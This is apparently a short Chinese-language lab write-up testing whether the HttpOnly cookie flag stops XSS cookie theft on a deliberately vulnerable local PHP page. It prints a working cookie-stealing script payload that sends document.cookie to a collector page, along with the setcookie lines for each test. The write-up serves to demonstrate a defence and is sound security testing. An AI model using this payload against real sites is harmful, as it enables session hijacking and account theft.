测试内容：

本次测试环境，搭建一个包含XSS漏洞的php环境。

地址：

http://localhost/home.php

如图所示：

存在xss漏洞，获取cookie的代码为：

<script>document.location = \'http://localhost/cookie_collect.php?cookie=\' + document.cookie;</script>

获取COOKIE的页面为：http://localhost/cookie_collect.php

如图所示：

测试01

未设置httponly属性，cookie设置为：

<?php 

 setcookie("xsstest", "xsstest", time()+3600, "/", "", false, false);

?>

测试结果：

获取到cookie的内容，如图所示：

访问日志内容为：

测试结果：利用跨站漏洞可以获取cookie内容。

测试02

设置httponly属性，cookie设置为：

<?php 

 setcookie("xsstest", "xsstest", time()+3600, "/", "", false, true);

?>

测试结果：

未获取到cookie的内容，如图所示：

访问日志内容为：

测试结果：利用跨站漏洞不能够获取cookie内容。